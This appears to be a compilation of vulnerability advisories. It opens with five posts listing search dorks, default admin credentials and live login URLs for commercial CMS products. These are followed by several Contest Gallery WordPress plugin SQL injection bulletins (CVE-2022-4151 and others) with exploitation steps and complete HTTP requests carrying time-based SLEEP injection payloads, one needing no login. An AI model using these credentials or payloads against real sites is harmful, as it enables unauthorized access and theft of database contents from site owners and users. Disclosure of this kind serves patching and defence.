Courier Deprixa version 2.5 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 Backdoor Account Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=09731 [+] https://deprixalogistics.online/dashboard/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Courier Deprixa 2.5 Backdoor Account

Consultine Consulting Business and Finance Website CMS version 1.8 has been reported as having a default backdoor account.

    =======================================================================================================================================================================================| # Title     : consultine consulting business and finance website cms v1.8 Backdoor Account Vulnerability                                                                            || # Author    : indoushka                                                                                                                                                             || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                                                                               | | # Vendor    : https://codecanyon.net/item/consultine-consulting-business-and-finance-website-cms/22236735                                                                           |  | # Dork      : About Us  Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex enim concludaturque. Senserit salutandi euripidis no per, modus maiestatis scribentur est an.|=======================================================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@gmail.com & pass=1234 [+] https://www.seusite.top/jornal/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Consultine Consulting Business And Finance Website CMS 1.8 Backdoor Account

Car Dealer Pro version 2.01 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Car Dealer Pro v2.01 Backdoor Account Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://codecanyon.net/item/car-dealer-pro/7265588                                                                 |  | # Dork      : "Powered by: Car Dealer Pro"                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=pass1234 [+] http://car.wenclub.vip/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Car Dealer Pro 2.01 Backdoor Account

Botble version 5.28.3 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Botble 5.28.3 Backdoor Account Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : hhttps://codecanyon.net/item/botble-cms-php-platform-based-on-laravel-framework/16928182                           |  | # Dork      : "Botble Technologies. All right reserved."                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=botble  & pass=159357 [+] https://cms.botble.com/admin/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Botble 5.28.3 Backdoor Account

Active Ecommerce CMS version 6.4.0 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Active ecommerce cms v6.4.0 Backdoor Account Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/active-ecommerce-cms/23471405?s_rank=24                                                |  | # Dork      : "category/beauty-health-hair"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@example.com  & pass=123456 [+] https://www.sbeshopping.com/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Active Ecommerce CMS 6.4.0 Backdoor Account

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the upload[] POST parameter before concatenating it to an SQL query in get-data-create-upload-v10.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

/

contest-gallery 19.1.5 (7/15) WordPress plug-in SQL injection

**contest-gallery 19.1.5 (7/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.5

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4153

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4153

**Vulnerability Description**

The upload[] MULTIPART POST query parameter in contest-gallery 19.1.5 is vulnerable to SQL Injection. An attacker with role of Author or above may abuse the _Save form_ functionality in get-data-create-upload-v10.php. This leads to a threat actor crafting multiple malicious POST requests.

**Exploitation Guide**

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Edit upload form.

Click on Save form.

Clicking Save form triggers the vulnerable request.

The request needs to be modified by replacing MULTIPART POST parameter upload[1][type] value from bh to url . Here upload[] is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of upload[] at line 251 in ./v10/v10-admin/upload/get-data-create-upload-v10.php.

At line 596 in ./v10/v10-admin/upload/get-data-create-upload-v10.php the database query call on $id leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&option_id=1&define_upload=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------2697798261719864473183552564
    Content-Length: 1215
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668359977
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="_wpnonce"
    
    07bde4fc61
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="_wp_http_referer"
    
    /wp-admin/admin-ajax.php?page=contest-gallery%2Findex.php&option_id=1&define_upload=true
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="option_id"
    
    1
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="upload[1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)][type]"
    
    url
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="upload[1][order]"
    
    4
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="actualID[]"
    
    1
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------2697798261719864473183552564--

CVE-2022-4153: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the option_id GET parameter before concatenating it to an SQL query in export-images-data.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (2/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4151

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4151

**Vulnerability Description**

The option_id GET query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An authenticated attacker may abuse the _Export all fields and total rating_ functionality in cg_images_data_csv_export function inside export-images-data.php. This leads to a threat actor crafting a malicious GET request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Export all fields and total rating

Clicking Export all fields and total rating triggers the vulnerable request, the option_id GET parameter is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of user_id at line 21 in ./v10/v10-admin/export/export-images-data.php.

At lines 38-43 in ./v10/v10-admin/export/export-images-data.php the database query call on $GalleryID leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=8+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3*2)))UrUZ)&edit_gallery=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cb131f9f1d3b9498930de4f620580d0214b838d43b71fdedf92328ca0032bbcdb; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cf386bbd185ec8df8d8f91a0b8e8c5431b81e06b292212515a24d8c73b7d47d52; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668300399
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    contest_gal1ery_post_create_data_csv=true

CVE-2022-4151: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (6/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4155

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4155

**Vulnerability Description**

The wp_user_id GET query parameter in contest-gallery 19.1.4.1 is vulnerable multiple to SQL Injection. An authenticated attacker may abuse the _Users Management_ functionality in management-show-user.php. This leads to a threat actor crafting multiple malicious GET requests.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click User management

Clicking User management triggers the vulnerable request.

**Exploit 1**

The request needs to be modified by adding GET parameter edit_registration, wp_user_id, and MULTIPART POST parameter cg_input_image_upload_file_to_delete_wp_id. Here wp_user_id is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of wp_user_id at line 18 in ./v10/v10-admin/users/admin/users/management-show-user.php.

At line 25 in ./v10/v10-admin/users/admin/users/management-show-user.php the database query call on $wpUserId leads to SQL Injection.

**Exploit 2**

The request needs to be modified by adding GET parameter edit_registration, wp_user_id, and wp_user_meta_entries. Here wp_user_id is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of wp_user_id at line 18 in ./v10/v10-admin/users/admin/users/management-show-user.php.

At line 46 in ./v10/v10-admin/users/admin/users/management-show-user.php the database query call on $wpUserId leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

**Exploit 1:**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&users_management=true&option_id=1&edit_registration_entries=1&wp_user_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ) HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------15540990533670320912247141513
    Content-Length: 506
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7Cd5b9cbd98cd7c7823a4eaafd9a2835604947bf858ba78d5e5dd7d78483c5ca16; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7C9aed4838ce07f42546cfa615b8a441061ea6a48fe19875091cb73070dad3d826; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668343335
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"
    
    Test
    -----------------------------15540990533670320912247141513--
    
    

**Exploit 2:**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&users_management=true&option_id=1&edit_registration_entries=1&wp_user_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)&wp_user_meta_entries=1 HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------15540990533670320912247141513
    Content-Length: 355
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7Cd5b9cbd98cd7c7823a4eaafd9a2835604947bf858ba78d5e5dd7d78483c5ca16; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7C9aed4838ce07f42546cfa615b8a441061ea6a48fe19875091cb73070dad3d826; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668343335
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------15540990533670320912247141513--

CVE-2022-4155: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_Fields POST parameter before concatenating it to an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (15/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4158

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4158

**Vulnerability Description**

The MULTIPART  cg_Fields POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An attacker with no privileges can abuse the _User Registration_ functionality in users-registry-check-registering-and-login.php. This leads to a threat actor crafting a malicious POST request.

**Exploitation Guide**

_**Note: In some cases, the line number mentioned in description text, above the image can be different from the image shown below it. This change is due to lines of code wrapping, which is done to represent long lines of code in the image. The description text represents the actual line number in the application.**_

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Add the shortcode cg_users_reg id="1". _**Note: id should be the id of any active the gallery.**_

_Registration form_ is visible to anyone vising the page.

Fill the form with _sample data_, and click Register.

Clicking Register triggers the vulnerable request.

The request needs to be modified by modifying the values of MULTIPART POST parameter cg_Fields[1][Form_Input_ID] and cg_Fields[1][Field_Type].

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of cg_Fields at line 33 in ./v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php.

Subsequently, value of parameter cg_Fields[1][Form_Input_ID] is assigned to $Form_Input_ID. 

At line 183 in ./v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php database query call on $Form_Input_ID leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
    Content-Length: 3796
    Origin: http://localhost:8080
    Connection: close
    Referer: http://localhost:8080/?p=1
    Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_current_page_id"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_check"
    
    63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="action"
    
    post_cg_registry
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_gallery_id_registry"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"
    
    1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"
    
    user-check-agreement-field					
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"
    
    2
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"
    
    main-nick-name
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"
    
    3
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"
    
    main-mail
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"
    
    2
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"
    
    ds@g.com
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"
    
    4
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"
    
    password
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"
    
    3
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"
    
    5
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"
    
    password-confirm
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"
    
    4
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg-main-mail"
    
    ds@g.com
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg-main-user-name"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg-main-nick-name"
    
    testing
    -----------------------------22204028416237992052154109961--

CVE-2022-4158: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_option_id POST parameter before concatenating it to an SQL query in export-votes-all.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4157

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4157

**Vulnerability Description**

The cg_option_id POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An authenticated attacker may abuse the _Export all votes_ functionality in cg_votes_csv_export_all function inside export-votes-all.php. This leads to a threat actor crafting a malicious POST request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Export all votes

Clicking Export all votes triggers the vulnerable request, the cg_option_id POST parameter is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of cg_option_id at line 19 in ./v10/v10-admin/export/export-votes-all.php.

At lines 54-60 in ./v10/v10-admin/export/export-votes-all.php the database query call on $GalleryID leads to SQL Injection.

At lines 99-110 in ./v10/v10-admin/export/export-votes-all.php the vulnerable input is again passed to variable- $queryString .

At line 112 in ./v10/v10-admin/export/export-images-data.php the database query call on $GalleryID leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

**Since the vulnerable query parameter cg_option_id is passed to two database queries, we can notice the sleep time of the request being four times(4 invocation) the given argument inSLEEP()\*(~12,000 milliseconds here as SLEEP(3))**.

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=1&cg_export_votes=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 106
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7Cafb735282dd2e1aeaff1d135419c00400e4e0e2a1d85809d6b54f126cfcd1883; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7C7ebf6c23f43d24912558008e7e934286452154ec3874ac04b09a1f136b885df3; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668310439
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    cg_export_votes=true&cg_export_votes_all=true&cg_option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3)))UrUZ)

Tag

#firefox